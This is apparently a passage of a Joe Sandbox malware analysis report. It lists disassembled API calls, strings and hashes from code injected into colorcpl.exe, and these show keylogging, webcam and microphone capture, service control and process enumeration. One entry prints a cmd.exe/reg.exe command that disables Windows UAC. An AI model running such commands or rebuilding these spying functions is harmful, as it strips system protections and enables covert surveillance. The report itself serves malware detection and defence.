                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0467A523,00000000), ref: 0467AC34
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A523,00000000), ref: 0467AC41
                                                                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0467A523,00000000), ref: 0467AC50
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A523,00000000), ref: 0467AC62
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A523,00000000), ref: 0467AC65
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 221034970-0
                                                                                                                              • Opcode ID: 19e951a666cc6d74f0093ed4ccfc15953a867b13e618653066bbe91d07a34075
                                                                                                                              • Instruction ID: dea9e6e719cd6a967c96d642c787dc6debba211af74d3921490a1cf7b8381151
                                                                                                                              • Opcode Fuzzy Hash: 19e951a666cc6d74f0093ed4ccfc15953a867b13e618653066bbe91d07a34075
                                                                                                                              • Instruction Fuzzy Hash: D7F0C2B15005387BD310AB64AC49DFF3BACDB86355F00001DFF0992140FB389D4989E4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0467A623,00000000), ref: 0467AAB5
                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0467A623,00000000), ref: 0467AAC9
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A623,00000000), ref: 0467AAD6
                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0467A623,00000000), ref: 0467AAE5
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A623,00000000), ref: 0467AAF7
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A623,00000000), ref: 0467AAFA
                                                                                                                              Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: 6c9fe1b42c1b6b41c48a42d3ff74f3b83d8193541b14d80b9c98c3b7c82ff7b0
• Instruction ID: 4c75509528545d0e54e32b1edc8bf8f660db54ef24032ad39b34d004cb7f25e2
• Opcode Fuzzy Hash: 6c9fe1b42c1b6b41c48a42d3ff74f3b83d8193541b14d80b9c98c3b7c82ff7b0
• Instruction Fuzzy Hash: 37F0C2715406286BD720AA65AC48EFF3BACDB46355F00001DFE0982140FB789D8A9AE0
Uniqueness
Uniqueness Score: -1.00%

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0467A5A3,00000000), ref: 0467ABB9
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0467A5A3,00000000), ref: 0467ABCD
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A5A3,00000000), ref: 0467ABDA
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0467A5A3,00000000), ref: 0467ABE9
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A5A3,00000000), ref: 0467ABFB
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A5A3,00000000), ref: 0467ABFE
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: 5b7273e3d9e82ff7db9ada0829158cc6c8136984bbb77b06694fba95aa956d90
• Instruction ID: 90d3cafbbf301cbec70ef1f086179618f2007e846ec278d66080ac718df03e66
• Opcode Fuzzy Hash: 5b7273e3d9e82ff7db9ada0829158cc6c8136984bbb77b06694fba95aa956d90
• Instruction Fuzzy Hash: 27F0AFB15045286BE7106B649C49DFF3BACDB46755F40001DFE0992140FB389D4985E4
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: S~E$PG$PG$PG
• API String ID: 3519838083-2466073847
• Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
• Instruction ID: 38b4ac3267cd3ab6e85f9004cf4f053acb826e5e09c0100b8af3d34fd0659a9f
• Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
• Instruction Fuzzy Hash: BA51B330E112489ADBC4FBB4CC61AFD7B7EAF44700F00442EE55AAB190EE649E89C758
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0671547C: __onexit.LIBCMT ref: 06715482
• __Init_thread_footer.LIBCMT ref: 066E25CA
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Init_thread_footer__onexit
• String ID: PkG$XMG$NG$NG
• API String ID: 1881088180-3151166067
• Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
• Instruction ID: 901bfe7bef556a40b0633064041d8a9ee1a1989fe65b517f8c9c22b2328daff5
• Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
• Instruction Fuzzy Hash: 0441BA316152108BC7E8FB24DD65EBE779EBB81710F10452EE06A972E0DF30AA49C759
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID:
• String ID: PkGNG
• API String ID: 0-263838557
• Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
• Instruction ID: eb789758ccec58daabc62b3773e3ff1fd5f6cbc7759d96a6fadc80fcb1d6dea6
• Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
• Instruction Fuzzy Hash: F5411BB1A00765AFE7A4DF7CCC44B6A7BE8EB49720F10862BF225DB280D675A5418790
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 046A3475
• _free.LIBCMT ref: 046A3540
• _free.LIBCMT ref: 046A354A
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\SysWOW64\colorcpl.exe$`.A
• API String ID: 2506810119-2653347025
• Opcode ID: 0042be283bfe42e27d0203f5b787c1b3e89a1047e889ff2669c400b4143366ef
• Instruction ID: 35d0ec49c3beb177aca18f115d4218d7235a6a513812b5aa3e2d45af64219f45
• Opcode Fuzzy Hash: 0042be283bfe42e27d0203f5b787c1b3e89a1047e889ff2669c400b4143366ef
• Instruction Fuzzy Hash: 01319271A00B58AFDB21DF99D88499EBBFCEF85714B1440AAE90497310F670AE91CF90
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0467361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,046D50E4), ref: 0467363D
  • Part of subcall function 0467361B: RegQueryValueExW.ADVAPI32(?,0466F313,00000000,00000000,?,00000400), ref: 0467365C
  • Part of subcall function 0467361B: RegCloseKey.ADVAPI32(?), ref: 04673665
  • Part of subcall function 0467BFB7: GetCurrentProcess.KERNEL32(?,?,?,0466DAAA,WinDir,00000000,00000000), ref: 0467BFC8
• _wcslen.LIBCMT ref: 0467B763
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CloseCurrentOpenProcessQueryValue_wcslen
• String ID: .exe$http\shell\open\command$program files (x86)\$program files\
• API String ID: 37874593-4246244872
• Opcode ID: b6b3c310da00fbd2e0ce9091d0c658a7bb799c39a8a3a36a146580985462a8fc
• Instruction ID: 4774e57521d43158cd48b26225db1f425b0fb071d1be322f6dc6ad43367bd8e4
• Opcode Fuzzy Hash: b6b3c310da00fbd2e0ce9091d0c658a7bb799c39a8a3a36a146580985462a8fc
• Instruction Fuzzy Hash: D6214F72A001046BEB14FAB88C959FE76ADDB45628B14057DE806A7280FE74BD0987A9
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0466B172
• wsprintfW.USER32 ref: 0466B1F3
  • Part of subcall function 0466A636: SetEvent.KERNEL32(?,?,00000000,0466B20A,00000000), ref: 0466A662
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
• API String ID: 1497725170-248792730
• Opcode ID: 7668c5f32bb2fdf5d27d023b6a79f683cb34f111f112eda4fb4175f906875869
• Instruction ID: 655343f635e03e5a1af95ff2591046cafd309b06ba80b0abe275a5ee4d90d899
• Opcode Fuzzy Hash: 7668c5f32bb2fdf5d27d023b6a79f683cb34f111f112eda4fb4175f906875869
• Instruction Fuzzy Hash: 1F114272504118AA9B18BB94EC548FE77FCEE49315B00011EF40796190FF74BE45C6EC
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID:
• String ID: (]?
• API String ID: 0-1886175342
• Opcode ID: eb958ff257bf0a4852a920068f473cb579aba7fa77d2949ff2d3fb07dc418e32
• Instruction ID: 8756c5fc314b2e30e2a252e1f6a6f17929b9afd236f4f2a78bf3d86e2cb458db
• Opcode Fuzzy Hash: eb958ff257bf0a4852a920068f473cb579aba7fa77d2949ff2d3fb07dc418e32
• Instruction Fuzzy Hash: 5101A7B3B09B257EF7205978ACC0F67260DDF517B8B240329BA31513D0FA74ECA149A0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0466779B
• CloseHandle.KERNEL32(?), ref: 046677AA
• CloseHandle.KERNEL32(?), ref: 046677AF
Strings
• C:\Windows\System32\cmd.exe, xrefs: 04667796
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 04667791
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
• Opcode ID: e531ba7ddabfa48dcd92e153c9a62ae874d5a376c78080213aeb0354c3bb0cd2
• Instruction ID: 6330287348f857f1e5a6553ad249e663cdfa277a931d9fc4305c48518912238e
• Opcode Fuzzy Hash: e531ba7ddabfa48dcd92e153c9a62ae874d5a376c78080213aeb0354c3bb0cd2
• Instruction Fuzzy Hash: EBF01272D4029D76DB20AAD6DC0DEDF7F7DEBC5B51F00055AB604A6140E6706844CAB5
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,046A32EB,00000000,?,046A328B,00000000,046CE948,0000000C,046A33E2,00000000,00000002), ref: 046A335A
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 046A336D
• FreeLibrary.KERNEL32(00000000,?,?,?,046A32EB,00000000,?,046A328B,00000000,046CE948,0000000C,046A33E2,00000000,00000002), ref: 046A3390
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,046D4EF8,04664E7A,00000001,?,00000000,046D4EF8,04664CA8,00000000,?,?,?), ref: 04665120
• SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?), ref: 0466512C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,046D4EF8,04664CA8,00000000,?,?,?), ref: 04665137
• CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?), ref: 04665140
  • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
APIs
  • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0467ADF2
• PlaySoundW.WINMM(00000000,00000000), ref: 0467AE00
• Sleep.KERNEL32(00002710), ref: 0467AE07
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0467AE10
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
APIs
• Sleep.KERNEL32(00000000,0466D262), ref: 046644C4
  • Part of subcall function 04664607: __EH_prolog.LIBCMT ref: 0466460C
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
• API String ID: 3469354165-3547787478
APIs
  • Part of subcall function 046A6137: HeapAlloc.KERNEL32(00000000,0469529C,?,?,04698847,?,?,?,?,?,0466DE62,0469529C,?,?,?,?), ref: 046A6169
• _free.LIBCMT ref: 046A4E06
• _free.LIBCMT ref: 046A4E1D
• _free.LIBCMT ref: 046A4E3C
• _free.LIBCMT ref: 046A4E57
• _free.LIBCMT ref: 046A4E6E
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: _free$AllocHeap
• API String ID: 1835388192-0
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Similarity
• API ID: _free
• API String ID: 269201875-0
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,046BF234), ref: 046A93CF
• WideCharToMultiByte.KERNEL32(00000000,00000000,046D2764,000000FF,00000000,0000003F,00000000,?,?), ref: 046A9447
• WideCharToMultiByte.KERNEL32(00000000,00000000,046D27B8,000000FF,?,0000003F,00000000,?), ref: 046A9474
• _free.LIBCMT ref: 046A93BD
  • Part of subcall function 046A6782: RtlFreeHeap.NTDLL(00000000,00000000,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A), ref: 046A6798
  • Part of subcall function 046A6782: GetLastError.KERNEL32(0000000A,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A,0000000A), ref: 046A67AA
• _free.LIBCMT ref: 046A9589
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• API String ID: 1286116820-0
APIs
  • Part of subcall function 0467BFB7: GetCurrentProcess.KERNEL32(?,?,?,0466DAAA,WinDir,00000000,00000000), ref: 0467BFC8
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0466F91B
• Process32FirstW.KERNEL32(00000000,?), ref: 0466F93F
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0466F94E
• CloseHandle.KERNEL32(00000000), ref: 0466FB05
  • Part of subcall function 0467BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0466F5F9,00000000,?,?,046D5338), ref: 0467BFFA
  • Part of subcall function 0467C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0467C1F5
  • Part of subcall function 0467C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0467C208
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0466FAF6
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• API String ID: 4269425633-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: 702f49b50218ec9e6a6b85ebb980d94754d1b54fdcec9eeb1255a4fac9b573cd
                                                                                                                              • Instruction ID: 8195f9e86b3b1a99295401345be8255eeb04ae6b80757dbba9eccb694f76d946
                                                                                                                              • Opcode Fuzzy Hash: 702f49b50218ec9e6a6b85ebb980d94754d1b54fdcec9eeb1255a4fac9b573cd
                                                                                                                              • Instruction Fuzzy Hash: 8441C136A006109FDB24DF78C881A9EB3F5FF89714F1545AAE915EB380EA71BD51CB80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __dosmaperr$_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 242264518-0
                                                                                                                              • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                                                                                                              • Instruction ID: 8aa0de7c2967b83080a16613e75a983a8e1450fd885c43409c9e729336662002
                                                                                                                              • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                                                                                                              • Instruction Fuzzy Hash: 2A31A67190421EBFDF519FA9DC48DAF3B7CEF05660B144256FA209A1A0EB31C950CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0469F8C8,?,00000000,?,00000001,?,?,00000001,0469F8C8,?), ref: 046B1179
                                                                                                                              • __alloca_probe_16.LIBCMT ref: 046B11B1
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 046B1202
                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0469AE84,?), ref: 046B1214
                                                                                                                              • __freea.LIBCMT ref: 046B121D
                                                                                                                                • Part of subcall function 046A6137: HeapAlloc.KERNEL32(00000000,0469529C,?,?,04698847,?,?,?,?,?,0466DE62,0469529C,?,?,?,?), ref: 046A6169
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1857427562-0
                                                                                                                              • Opcode ID: e0c7cddde11e8be1e22943d6973e8fd23ecbe4917915bb8571c2475849ab2d28
                                                                                                                              • Instruction ID: b6e1e50f1bbcc9b6c3b6d6ab22ff5d7f894753f9e05d9f09a506ed02eec72450
                                                                                                                              • Opcode Fuzzy Hash: e0c7cddde11e8be1e22943d6973e8fd23ecbe4917915bb8571c2475849ab2d28
                                                                                                                              • Instruction Fuzzy Hash: 3031BC72A0021AABDF25DFA5DC50DEE7BA5EB51350B084168EC04DB290F735EDA1CBE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 04661BF9
                                                                                                                              • waveInOpen.WINMM(046D2AC0,000000FF,046D2AA8,Function_00001D0B,00000000,00000000,00000024), ref: 04661C8F
                                                                                                                              • waveInPrepareHeader.WINMM(046D2A88,00000020), ref: 04661CE3
                                                                                                                              • waveInAddBuffer.WINMM(046D2A88,00000020), ref: 04661CF2
                                                                                                                              • waveInStart.WINMM ref: 04661CFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1356121797-0
                                                                                                                              • Opcode ID: ed1bb27ac76961062bca86eef0472d1fc34393a87888cd0830df0e6fe52119c5
                                                                                                                              • Instruction ID: ff62457c75d611412fa829a824888a86ebb57de04093bf183e45fa88baf13ab3
                                                                                                                              • Opcode Fuzzy Hash: ed1bb27ac76961062bca86eef0472d1fc34393a87888cd0830df0e6fe52119c5
                                                                                                                              • Instruction Fuzzy Hash: 83217C71E062019FD724DF25E8389567BB5FB8471470860AEA106CB690FB3C5C00CF68
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 046AF363
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 046AF386
                                                                                                                                • Part of subcall function 046A6137: HeapAlloc.KERNEL32(00000000,0469529C,?,?,04698847,?,?,?,?,?,0466DE62,0469529C,?,?,?,?), ref: 046A6169
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 046AF3AC
                                                                                                                              • _free.LIBCMT ref: 046AF3BF
                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 046AF3CE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2278895681-0
                                                                                                                              • Opcode ID: 7887444f265d64aba4fe66cd5ff80dc6931bc5d2aa9c703e01f7b6e7b084dc2c
                                                                                                                              • Instruction ID: 40ad9ad03ee2cc7efd26b2e76444f514aec74eceae0be677734614e8ef844f34
                                                                                                                              • Opcode Fuzzy Hash: 7887444f265d64aba4fe66cd5ff80dc6931bc5d2aa9c703e01f7b6e7b084dc2c
                                                                                                                              • Instruction Fuzzy Hash: CB01B1B2601B147B232516AA5C8CC7B7A6CDEC6AA4315012DF904C2300FA64AD1299F1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 04671170
                                                                                                                              • int.LIBCPMT ref: 04671183
                                                                                                                                • Part of subcall function 0466E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0466E0D2
                                                                                                                                • Part of subcall function 0466E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0466E0EC
                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 046711C3
                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 046711CC
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 046711EA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2536120697-0
                                                                                                                              • Opcode ID: 7143892b902b325c135d1188f51578cbd93cba95a722d9746eb8eea1ecc6940a
                                                                                                                              • Instruction ID: f005b9939135f867a2f398724133f207a80b0bcc2c5bb9675285826b026f3cc0
                                                                                                                              • Opcode Fuzzy Hash: 7143892b902b325c135d1188f51578cbd93cba95a722d9746eb8eea1ecc6940a
                                                                                                                              • Instruction Fuzzy Hash: E011A772A00118A7DB15FFA4E8048EDBBB9DF41654B10055FE805A7390FB71BE4187D4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
